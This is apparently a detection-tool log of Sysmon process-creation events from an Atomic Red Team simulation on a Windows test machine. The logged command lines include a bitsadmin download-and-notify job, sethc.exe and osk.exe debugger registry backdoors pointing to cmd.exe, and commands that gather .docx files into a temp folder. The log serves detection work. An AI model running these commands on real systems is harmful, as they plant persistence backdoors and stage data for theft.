<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547711.04171,2019-07-19T18:48:31.041710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /complete AtomicBITS&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:31.012222Z"">
</TimeCreated>
<EventRecordID>3663</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:30.995</Data>
<Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-001046E52E00</Data>
<Data Name=""ProcessId"">4332</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /complete AtomicBITS&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.917348,2019-07-19T18:48:30.917348+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:30.900988Z"">
</TimeCreated>
<EventRecordID>3661</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:30.882</Data>
<Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-001088DE2E00</Data>
<Data Name=""ProcessId"">7072</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.807486,2019-07-19T18:48:30.807486+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:30.799468Z"">
</TimeCreated>
<EventRecordID>3659</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:30.775</Data>
<Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-0010A2D72E00</Data>
<Data Name=""ProcessId"">4036</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547807.299766,2019-07-19T18:50:07.299766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:07.279972Z"">
</TimeCreated>
<EventRecordID>3733</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:07.254</Data>
<Data Name=""ProcessGuid"">747F3D96-D89F-5D31-0000-00106C7D3200</Data>
<Data Name=""ProcessId"">864</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547807.279972,2019-07-19T18:50:07.279972+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:02.249575Z"">
</TimeCreated>
<EventRecordID>3732</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:02.238</Data>
<Data Name=""ProcessGuid"">747F3D96-D89A-5D31-0000-0010F2703200</Data>
<Data Name=""ProcessId"">1132</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547802.194097,2019-07-19T18:50:02.194097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:02.174886Z"">
</TimeCreated>
<EventRecordID>3729</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:02.144</Data>
<Data Name=""ProcessGuid"">747F3D96-D89A-5D31-0000-0010A46B3200</Data>
<Data Name=""ProcessId"">1228</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547802.174886,2019-07-19T18:50:02.174886+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:52.275626Z"">
</TimeCreated>
<EventRecordID>3728</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:52.263</Data>
<Data Name=""ProcessGuid"">747F3D96-D890-5D31-0000-001085443200</Data>
<Data Name=""ProcessId"">4316</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547792.275626,2019-07-19T18:49:52.275626+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /R c: %%f in (*.docx) do copy %%f c:\temp\&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:52.210871Z"">
</TimeCreated>
<EventRecordID>3727</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:52.202</Data>
<Data Name=""ProcessGuid"">747F3D96-D890-5D31-0000-0010FA3F3200</Data>
<Data Name=""ProcessId"">1568</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /R c: %%f in (*.docx) do copy %%f c:\temp\&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547792.053916,2019-07-19T18:49:52.053916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c&quot; dir c: /b /s .docx &quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:52.048002Z"">
</TimeCreated>
<EventRecordID>3725</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:52.011</Data>
<Data Name=""ProcessGuid"">747F3D96-D890-5D31-0000-001012383200</Data>
<Data Name=""ProcessId"">608</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /S /D /c&quot; dir c: /b /s .docx &quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D88F-5D31-0000-0010BD353200</Data>
<Data Name=""ParentProcessId"">2780</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c: /b /s .docx | findstr /e .docx&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547792.048002,2019-07-19T18:49:52.048002+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c: /b /s .docx | findstr /e .docx&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:51.996250Z"">
</TimeCreated>
<EventRecordID>3724</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:51.971</Data>
<Data Name=""ProcessGuid"">747F3D96-D88F-5D31-0000-0010BD353200</Data>
<Data Name=""ProcessId"">2780</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c: /b /s .docx | findstr /e .docx&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
